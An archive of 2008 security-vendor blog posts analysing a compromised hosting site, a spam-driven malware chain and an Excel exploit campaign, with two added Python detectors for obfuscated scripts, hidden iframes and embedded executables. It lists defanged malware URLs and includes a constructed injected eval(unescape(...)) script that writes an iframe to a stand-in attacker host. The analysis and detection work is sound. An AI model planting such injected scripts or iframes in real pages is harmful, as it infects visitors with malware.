Archive for March 9th, 2008
March 9th, 2008 by Joseph Pacamarra (Threats Analyst)

Research Project Manager Ivan Macalintal reported a few hours ago that another Thailand-based Web hosting site appears to have been compromised to serve malware.
The APAC regional TrendLabs team immediately probed and analyzed the attack layout on the compromised site www.ictbannok.com and identified a tricky injection that had been put in place prematurely.
Based on our analysis, the main site was about to be heavily laden with scripts when it was first reported. Since the main page itself looked like nothing more than a site with a broken script, and our first approach hit a dead end, we tried a different avenue and found this:
|
http://www.ictbannok.com /*
(Cloaking with a 404 error, still heavily laden with an encrypted script which leads to)
|
hxxp://www.ictbannok.com.96fad701b73f1f53.2traff.cn/traff2.cn/
|
Host Location: Estonia
|
Host Location: European Union
[Russian Federation]
|
The following malicious files are dropped at this point:
TROJ_SHEUR.DZJ and TROJ_INJECT.IS
|
Host Location: Ukraine
|
TSPY_LDPINCH.JR
These tiers were taken down 20 minutes or less after our probing. Too late for the attack's authors: their tracks were traced back, pinpointing the actual file they were hoping to deliver through obfuscation, with the iframe serving as the drop-off point.
With a coordinated effort from APAC-RTL spearheaded by Oscar R., the Trend Micro Thailand office (Wan K.) and Kitisak J. of ThaiCert, the ictbannok.com site administrator was advised of the incident and had the site cleaned in no time. It is now back to its regular business.
Trend Micro has detected these files since pattern file 5.144.05, using scan engine 8.5001002 or later.
March 9th, 2008 by JM Hipolito (Technical Communications)

Members of the old-school virus-writing group 29A may have grown out of virus writing: their last active member has announced the group's retirement, The Register reports.
The underground VXer group, responsible for the first Windows 2000 virus and the first 64-bit virus, also created early mobile malware that mainly infected PDAs. The group called it quits after several members left early this year. Its last active member, VirusBuster, reportedly tried to contact known key member ValleZ to decide the group's fate, but to no avail, leading to the announcement.
The demise of the old-school virus-writing scene underscores the shift in the primary motivation behind today's threat landscape, from recognition and intellectual curiosity to profit.
This retirement could be a turn for the better or for the worse, depending on whether these virus writers stop writing malware altogether or join the more shady, profit-driven malware authors of today. The idea of these skilled individuals turning their expertise against malware instead of creating it is far more interesting, and much more favorable.
March 9th, 2008 by Loucif Kharouni (Threats Analyst)
While checking my personal spam emails received yesterday, I got interested in a certain email asking the user to view adult pictures by clicking on the following picture:

Clicking on the picture leads to hxxp://{BLOCKED}-carvalhal.pt/tits.exe, a malicious file detected as TROJ_SHEUR.HD (the link, however, has been unavailable since yesterday afternoon).
Once I got hold of this file, I was curious to know what could be on the main page of this web site, so I just typed hxxp://{BLOCKED}-carvalhal.pt into my browser's address bar. I then got really infected by a succession of malware loading in memory, reminding me of a 404 toolkit which, at the end of its infection chain, installs a rogue anti-virus product named WinIFixer on the system:

I decided to take a closer look at the main page's source code, which turned out to contain two scripts redirecting to two different URLs:

Once these scripts execute, the computer becomes nearly unusable, as it is too busy loading iframes, scripts and malware.
Let's now take hxxp://{BLOCKED}hosting.net/404.php, which redirects us to:

And hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20 redirects us to:

The downloaded file t.php is an encoded script which in turn redirects to yet another location to fetch malware.
Two more files are then loaded: an HTM file and a file named svchost.t__, which downloads the following files:
- FR
- |429–hxxp://{BLOCKED}.65.239.42/msc61/u_f1_v34_78.exe
- |406–hxxp://{BLOCKED}.65.239.42/msc61/inst250.exe
- |428–hxxp://{BLOCKED}.65.239.42/msc61/krab.exe
- |251–hxxp://{BLOCKED}.54.89.222/loader.exe
- |230–hxxp://{BLOCKED}.65.239.42/msc61/ldig002.exe
- |437–hxxp://{BLOCKED}.65.239.42/msc61/terasole.exe
- |374–hxxp://{BLOCKED}.65.239.42/msc61/2302.exe
- |
To summarize how the Web site architecture chains all of this together, here is a short diagram:
hxxp://{BLOCKED}-carvalhal.pt JS_CLICKER.ZU
|
|
|link
---> hxxp://{BLOCKED}hosting.net/404.php
|
|
|script
---> hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20
|
|
|iframe
---> hxxp://{BLOCKED}nhex.org/t.php
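Both incidents on this page rely on the same two tricks: a page (here a cloaked "404" in the ictbannok.com case, the main page in the -carvalhal.pt case) that still carries an obfuscated script, and off-site iframes that pull in the next tier. The scanner below is an added example written for this page, not Trend Micro's tooling or anything recovered from either site; the sample HTML, the host names in it and the detection thresholds are constructed. It flags inline scripts that feed long %XX or \xXX escape runs into eval()/unescape()/document.write() and decodes the run to show what it would have written, and it flags iframes that are both hidden (zero size or display:none) and point off the page's own host.

```python
"""Heuristic scanner for injected, obfuscated scripts and hidden off-site
iframes in HTML. Example code for this page; the sample page is constructed."""
import re
from urllib.parse import urlparse

# Constructed sample: a "404" page whose body still carries an injected
# obfuscated script and a zero-size iframe to a third-party host.
SAMPLE_404 = """<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%65%78%61%6d%70%6c%65%2f%74%2e%70%68%70%22%3e%27%29'));</script>
<iframe src="http://ads.example.net/in.cgi?20" width="0" height="0" frameborder="0"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)', re.I)
# A run of at least 16 %XX or \xXX escapes is a payload, not a stray character.
ESCAPE_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){16,}")
SUSPICIOUS_CALLS = ("eval(", "unescape(", "document.write(", "String.fromCharCode(")


def hidden_iframes(html, page_host):
    """Return src URLs of iframes that are both off-site and visually hidden."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        hidden = tiny or "display:none" in tag.replace(" ", "").lower()
        if src and host != page_host and hidden:
            hits.append(src)
    return hits


def obfuscated_scripts(html):
    """Return (calls_seen, decoded_prefix) for inline scripts that pass an
    escaped payload to eval/unescape/document.write/String.fromCharCode."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        calls = [c for c in SUSPICIOUS_CALLS if c in body]
        run = ESCAPE_RUN_RE.search(body)
        if calls and run:
            # Decode the escape run the way unescape() would, to see what it writes.
            decoded = re.sub(r"(?:%|\\x)([0-9a-fA-F]{2})",
                             lambda m: chr(int(m.group(1), 16)), run.group(0))
            hits.append((",".join(calls), decoded[:80]))
    return hits


def scan(html, page_host):
    """Run both heuristics against a page fetched from page_host."""
    return {
        "hidden_iframes": hidden_iframes(html, page_host),
        "obfuscated_scripts": obfuscated_scripts(html),
    }


if __name__ == "__main__":
    for name, findings in scan(SAMPLE_404, "www.example.com").items():
        print(name, findings)
```

Run against the constructed page, the decoded escape run comes out as a document.write() of an iframe pointing at a third host, which is exactly the tiered redirect drawn in the diagram above. Note that this catches only cleartext escapes; a script that builds its payload arithmetically or from a split string needs a real JavaScript interpreter, not a regex.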
Here are all the URLs called in this threat:
- hxxp://{BLOCKED}-carvalhal.pt/tits.exe
- hxxp://{BLOCKED}-carvalhal.pt/
- hxxp://{BLOCKED}forama.com/tds/in.cgi
- hxxp://{BLOCKED}hosting.net/404.php
- hxxp://{BLOCKED}ogle-analystic.com/in.cgi?20
- hxxp://{BLOCKED}nhex.org/t.php
- hxxp://{BLOCKED}8.72.168.176/e-n0303vt/index.php
- hxxp://{BLOCKED}5.93.219.206/gr/index.php
- hxxp://{BLOCKED}landdreams.com/check/versionl.php?t=577
- hxxp://{BLOCKED}landdreams.com/check/n14041.htm
- hxxp://{BLOCKED}landdreams.com/check/n14042.htm
The following ones are not called, but knowing the 404 rootkit, I assumed they existed. I tried to retrieve them and found them all to be working:
- hxxp://{BLOCKED}landdreams.com/check/n14043.htm
- hxxp://{BLOCKED}landdreams.com/check/n14044.htm
- hxxp://{BLOCKED}landdreams.com/check/n14045.htm
- hxxp://{BLOCKED}landdreams.com/check/n14046.htm
- hxxp://{BLOCKED}landdreams.com/check/n14047.htm
- hxxp://{BLOCKED}landdreams.com/check/n14048.htm
- hxxp://{BLOCKED}landdreams.com/check/n14049.htm
By decrypting some code within some of the HTM files above, I found the following links to be malicious:
- hxxp://{BLOCKED}earscontract.com/check/vers195.php?q=3
- hxxp://{BLOCKED}earscontract.com/check/vers195.php
- hxxp://{BLOCKED}.93.219.206/gr/ - fake Apache error, due to WinIFixer installation
- hxxp://{BLOCKED}.93.219.206/gr/loader.exe
- hxxp://{BLOCKED}.93.219.206/1stat/get_exa.php
- hxxp://{BLOCKED}.93.219.206/1stat/get_exb.php
- hxxp://{BLOCKED}.93.219.206/1stat/get_exc.php
- hxxp://{BLOCKED}.93.219.206/1stat/get_exd.php
- hxxp://{BLOCKED}.93.219.206/1files/mix/file1.exe
- hxxp://{BLOCKED}.93.219.206/1files/mix/file2.exe
- hxxp://{BLOCKED}.93.219.206/1files/mix/file3.exe
- hxxp://{BLOCKED}.93.219.206/1files/mix/file4.exe
Since yesterday, the malicious script on hxxp://{BLOCKED}-carvalhal.pt/ has already been modified. Trend Micro detects the script as HTML_IFRAME.GQ.
All files gathered, as well as the malicious URLs, have already been submitted.
An Ethereal capture and a video (25 MB) of the whole infection are available on demand.
Here is a short list of all malware detected:
- ctfmona.exe -> TROJ_DLOADER.JG
- Fsd9mk4g.dll -> TROJ_DLOADER.DUF
- inst250.exe -> TROJ_DROPPER.DRL
- Jfs9jg.dll -> TROJ_SMALL.BKJ
- krab.exe -> TROJ_AGENT.WNQ
- ldig002.exe -> TROJ_DLOADER.ENR
- msgk429.exe -> TROJ_DNSCHANGE.Y
- symavc32.sys -> TROJ_ROOTKIT.EZ
- u_f1_v34_78.exe -> TROJ_DNSCHANGE.Y
- winlogan.exe -> TROJ_DLOADER.DJH
- Wmgq44.sys -> TROJ_ROOTKIT.EZ
- ieupdr2.exe -> TROJ_DLOADER.LSI
- ie_updates3r.exe -> TROJ_DLOADER.LSI
- jf-carvalhal[1].txt -> JS_CLICKER.ZU
- loader.exe -> TROJ_CUTWAIL.AR
- msgk251.exe -> TROJ_CUTWAIL.AR
- nwan.dat -> TROJ_PROXY.TO
- terasole.exe -> BKDR_MOMIBOT.B
- tits.exe -> TROJ_SHEUR.HD
- WinIFixer.exe -> TROJ_WINFIXER.FD
- winlugan.exe -> TROJ_DLOADER.LSI
- WLCtrl32.dll -> TROJ_AGENT.ANX
March 9th, 2008 by Joseph Cepe (Threats Analyst)
XLS files specially crafted to exploit a currently unpatched vulnerability in Microsoft Excel (identified as CVE-2008-0081) are reportedly being sent as email attachments in the wild.
The attachments, which arrive as either OLYMPIC.XLS or SCHEDULE.XLS, are capable of dropping and executing Windows binary executables. The Trojan also drops a non-malicious Excel file and opens it upon execution, to make the user believe it is the attached Excel file. Below are screenshots of the Excel files dropped by OLYMPIC.XLS and SCHEDULE.XLS, respectively.


Both OLYMPIC.XLS and SCHEDULE.XLS appear to be built from the same exploit template, which even allows malware writers to customize the exploit to perform other routines.
With Microsoft's security patch still a week away, malware authors are using this window of opportunity to infect as many computers as possible. More information on this exploit can be found in the Microsoft Security Advisory for this vulnerability.
Trend Micro advises users to be wary of opening unsolicited email messages, and even more so of files attached to them. Trend Micro already detects the above files as TROJ_MDROP.AH as of Control Pattern 5.136.12.
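A dropper of the kind described above has to carry the Windows executable it drops somewhere inside the .xls file. The check below is an added example written for this page, not Trend Micro's detection logic and not derived from OLYMPIC.XLS or SCHEDULE.XLS, whose internals the post does not describe: it confirms the file is a legacy OLE compound document (the container format of binary .xls) and then looks for an MZ header whose e_lfanew field points at a valid "PE\0\0" signature, which is how a cleartext embedded executable can be told apart from a stray "MZ" byte pair. The sample bytes are constructed, including a minimal, non-runnable MZ/PE skeleton used only to exercise the scanner.

```python
"""Heuristic check for an Office document carrying an embedded Windows
executable. Example code for this page; all sample bytes are constructed."""
import struct

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # compound-document header (legacy .xls/.doc)
DOS_STUB = b"This program cannot be run in DOS mode"


def find_embedded_pe(data):
    """Return offsets of MZ headers whose e_lfanew points at a valid 'PE\\0\\0'."""
    hits = []
    pos = data.find(b"MZ")
    while pos != -1:
        # e_lfanew (offset of the PE signature) lives at 0x3C of the DOS header,
        # so we need at least 0x40 bytes from the MZ to read it.
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\0\0":
                hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


def assess(data):
    """Combine the container check with the embedded-PE search into a verdict."""
    is_ole = data.startswith(OLE_MAGIC)
    pes = find_embedded_pe(data)
    return {
        "ole_container": is_ole,
        "embedded_pe_offsets": pes,
        "dos_stub_string": DOS_STUB in data,
        "verdict": ("suspicious: executable inside document"
                    if is_ole and pes else "no embedded PE found"),
    }


def build_fake_pe():
    """Constructed minimal MZ/PE skeleton (headers only, not runnable code)."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x80)        # e_lfanew -> PE signature at 0x80
    stub = DOS_STUB.ljust(0x80 - len(dos), b"\0")  # DOS stub text, padded to 0x80
    return bytes(dos) + stub + b"PE\0\0" + b"\0" * 0x100


# Constructed samples: an OLE header padded out, and the same with a PE appended.
CLEAN_XLS = OLE_MAGIC + b"\0" * 0x200
DROPPER_XLS = OLE_MAGIC + b"\0" * 0x200 + build_fake_pe()

if __name__ == "__main__":
    print(assess(CLEAN_XLS))
    print(assess(DROPPER_XLS))
```

The caveat a practitioner would add: this only finds an executable stored in the clear. Droppers frequently XOR or otherwise encode the embedded payload so that neither "MZ" nor the DOS stub string appears, in which case the document has to be detonated or the exploit shellcode traced to recover it; treat a clean result here as "nothing obvious", not as "benign".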